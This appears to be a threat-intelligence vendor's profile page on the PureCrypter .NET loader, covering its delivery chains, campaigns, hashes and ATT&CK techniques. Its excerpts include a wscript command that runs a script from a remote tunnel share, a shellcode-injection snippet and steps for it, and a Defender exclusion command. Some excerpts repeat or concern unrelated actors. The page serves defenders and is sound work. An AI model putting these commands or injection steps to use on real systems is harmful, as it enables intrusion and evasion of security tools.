PureCrypter
PureCrypter is a commercial .NET crypter/loader associated with the PureCoder malware-as-a-service ecosystem and used as an obfuscation and delivery layer for other malware. Across the provided reporting, it is described as a .NET-based executable, commonly obfuscated with SmartAssembly or ConfuserEx, that decrypts embedded resources, decompresses them, loads the resulting .NET assembly in memory via Assembly.Load, and invokes it through reflection. Multiple analyses specifically describe PureCrypter as a .NET 3DES loader using 3DES-CBC with PKCS7 padding, followed by GZip decompression of an embedded payload and reflective execution. It has been observed as a secondary dropper/resource loader carrying additional encrypted inner payloads and deploying final malware families including PureLogs, Agent Tesla, RedLine, DarkTrack RAT, Remcos, and other RATs and stealers.
Observed delivery chains show PureCrypter used in multi-stage intrusions and phishing campaigns. In BI.ZONE reporting on Fluffy Wolf activity targeting Russian companies from March to May 2026, phishing emails delivered archives directly or via GitHub links; a C++ loader named PowerLoader launched hidden PowerShell, retrieved scripts from a command server, then downloaded and executed PureCrypter to deploy the final payload. In SERPENTINE#CLOUD activity targeting German-speaking victims with fake DATEV invoice lures, staging used Cloudflare trycloudflare.com tunnels, WSH/WSF/BAT scripts, downloaded Python runtimes, Donut shellcode, and Early Bird APC injection into explorer.exe before launching two PureCrypter samples. Those PureCrypter instances were described as .NET resource loaders carrying additional encrypted inner payloads. Broader SERPENTINE#CLOUD reporting also places PureCrypter in a recurring chain of batch stager -> Python loader -> Donut shellcode -> PureCrypter -> inner RAT.
Technical behavior directly mentioned in the content includes sending a TLS 1.2-encrypted infection message via Discord webhook and executing Set-MpPreference -ExclusionPath to exclude files or folders from Microsoft Defender scans. In recovered loader samples from SERPENTINE#CLOUD, PureCrypter loaders were PE32 .NET x86 binaries targeting CLR v4.0.30319, with embedded resource names such as Jaglt and Ctjady, silent exception handling, and reflection targets that varied by builder version. The Sep/Oct05 loader sample Fviwknzr.exe had SHA-256 dcd22d338a0bc4cf615d126b84dfcda149a34cf18bc43b85f16142dfb019e608; Nov loader samples Erqcke.exe had SHA-256 0ab09a4787ea9cb259cadd3f811a56f7bd0058287634bbaf0388b2cd40464505 and b1c6659ee4ee35540f5ed043b611ac88a7fce9dc2f564168e7d47c43683163f6. Reported inner payloads delivered by these loaders included Qdjlj.dll (SHA-256 cdf87d68885caa3e94713ded9dd5e51c39b7bc7ef9bf7d63a4ff5ab917a96b36), described as a PureLogs credential/crypto-stealing build, and Mvfsxog.dll (SHA-256 046d0e83c1e6dcaf526127b81b962042e495f5ae3a748f3a9452be62f905acf8), described as a PureLogs plugin stager.
The malware is repeatedly associated with financially motivated intrusion sets and commodity malware delivery operations rather than a single exclusive actor. Reported users or linked campaigns include Fluffy Wolf, the SERPENTINE#CLOUD cluster, and other operators using PureCoder tooling. Targeting mentioned in the content includes Russian companies in construction, consulting, engineering, retail, e-commerce, and industrial sectors, as well as German-speaking businesses targeted with invoice-themed lures. The content also notes PureCrypter pricing in MaaS contexts, including an annual subscription price of about USD 449 in one report and a one-month subscription price of USD 59 in earlier reporting.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
5 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Далее вредонос скачивает и запускает PureCrypter, который уже разворачивает финальную полезную нагрузку.
Its tooling also involves crypters such as HeartCrypt, PureCrypter, and those developed by threat actors like “Roda” and “pjoao1578”...
Its tooling also involves crypters such as HeartCrypt, PureCrypter, and those developed by threat actors like “Roda” and “pjoao1578”...
PureCrypter malware has been observed distributing multiple RATs and information stealers. It is a .NET-based executable, obfuscated with SmartAssembly...
Techniques & procedures
28 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 techniqueResource Development Web Services: Cloudflare Tunnels T1583.006 1–6 Free Quick Tunnel, no account required
Initial Access
2 techniquesК посланиям прилагались «акты сверки», «претензии» и другие документы, которые на деле оказывались архивами с малварью. Иногда вложение прикреплялось напрямую...
...а в других случаях жертве предоставляли ссылку на GitHub-репозиторий, откуда загружался RAR-архив. По словам исследователей, Fluffy Wolf активно использует GitHub, потому что такие ссылки выглядят легитимно и помогают обходить почтовые фильтры...
Execution
7 techniquesDuring the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
The batch stagers are the initial execution layer. 29 .bat files recovered across six evidence directories deduplicate to 13 unique templates in four categories.
wscript.exe //B \\tunnel1\DavWWWRoot\dat.wsh └─> Cross-tunnel redirect to \\tunnel2\DavWWWRoot\dat.wsf
The ZIP contains a Python runtime and one or more loader scripts. Each loader decrypts embedded shellcode, and that shellcode bootstraps the .NET Common Language Runtime (CLR) to load the actual payload.
allocate RWX memory, write shellcode via WriteProcessMemory ... ctypes.windll.kernel32.VirtualProtect(... 0x40, # PAGE_EXECUTE_READWRITE ... )
Victim clicks "DATEV-Rechnung Nr. 69928142421.pdf.lnk"
Persistence
2 techniquesDuring the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or batch files in the Windows Startup folder.
Privilege Escalation
4 techniquesDuring the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
Injection technique: create a suspended notepad.exe , allocate RWX memory, write shellcode via WriteProcessMemory , queue an APC, resume the thread.
Injection technique: create a suspended notepad.exe , allocate RWX memory, write shellcode via WriteProcessMemory , queue an APC, resume the thread... Instead of notepad.exe, the loaders now create a suspended explorer.exe and use Early Bird APC injection
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or batch files in the Windows Startup folder.
Stealth
10 techniquesThe content repeatedly describes adversaries using Base64, XOR, RC4, AES, hexadecimal encoding, string encryption, code flattening, custom crypters, and other obfuscation methods to hide payloads, strings, configuration data, URLs, and scripts.
Mosquito’s installer is obfuscated with a custom crypter. PureCrypter has used SmartAssembly and .NET Reactor for string encryption and control flow obfuscation. PyDCrypt has been compiled and encrypted with PyInstaller using the --key flag.
Obfuscated Files: Encrypted Payload T1027.013 Multi-layer XOR + Chaskey CTR + AES
Masquerading: Match Legitimate Name T1036.005 DATEV invoice filename
Injection technique: create a suspended notepad.exe , allocate RWX memory, write shellcode via WriteProcessMemory , queue an APC, resume the thread.
Injection technique: create a suspended notepad.exe , allocate RWX memory, write shellcode via WriteProcessMemory , queue an APC, resume the thread... Instead of notepad.exe, the loaders now create a suspended explorer.exe and use Early Bird APC injection
The content repeatedly describes adversaries and malware deleting files, directories, droppers, scripts, logs, archives, staged data, and other artifacts from compromised systems, e.g., 'APT29 has used SDelete to remove artifacts from victim networks' and 'Lazarus Group malware has deleted files in various ways, including "suicide scripts" to delete malware binaries from the victim.'
After patching, Donut loads mscoree.dll , calls CLRCreateInstance to start the .NET CLR (v4.0.30319), and invokes ExecuteInDefaultAppDomain with the target class and method names stored in the instance.
Donut is the bridge between the Python shellcode and .NET. Every wave uses it. The framework packages .NET assemblies as position-independent shellcode that bootstraps the CLR from scratch.
Command and Control
5 techniquesC2 Application Layer Protocol: Web Protocols T1071.001 1–6 WebDAV over HTTPS for staging
Proxy: External Proxy T1090.002 Cloudflare tunnel for staging
Этот инструмент написан на C++ и запускает PowerShell в скрытом режиме, получая скрипты с управляющего сервера. Далее вредонос скачивает и запускает PureCrypter, который уже разворачивает финальную полезную нагрузку.
The content repeatedly describes malware and threat actors using SSL, TLS, HTTPS, RSA, AES, Blowfish, RC4, ECIES, Diffie-Hellman, OpenSSL, WolfSSL, and mutual TLS to protect command and control traffic.
All tunnels use Cloudflare's free Quick Tunnel service ( trycloudflare.com ). The origin server IP is never exposed — all traffic proxies through Cloudflare's anycast network
Other
3 techniquesDefense Evasion Subvert Trust Controls: AMSI Bypass T1562.001 1, 3 Donut AMSI patch + DcRat runtime AMSI patch
The content repeatedly describes threat actors and malware disabling or modifying security tools, EDR/AV, logging, firewall rules, integrity checkers, and security settings; e.g., 'Agrius used several mechanisms to try to disable security tools' and 'BlackByte disabled security tools such as Windows Defender and the Raccine anti-ransomware tool during operations.'
BlackByte Ransomware 'adds .JS and .EXE extensions to the Microsoft Defender exclusion list'; PureCrypter 'executed Set-MpPreference -ExclusionPath'; QakBot 'modify the Registry to add its binaries to the Windows Defender exclusion list'; Raspberry Robin 'add an exception to Microsoft Defender that excludes the entire main drive'; StrongPity 'add directories used by the malware to the Windows Defender exclusions list'; XLoader 'can add the path of its executable to the Microsoft Defender exclusion list'; ZIPLINE 'can add itself to the exclusion list for the Ivanti Connect Secure Integrity Checker Tool.'
IOCs tracked for this family
36 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
26 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Криптер/загрузчик, который разворачивает финальную полезную нагрузку после запуска PowerLoader.
Mentioned only as related malware/reporting in the see-also section, without operational details in the main content.
A crypter/loader component used in an older PureRAT campaign build to protect and load the payload in memory.
Loader/crypter used in Wave 1 as a dropper for additional encrypted inner payloads.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.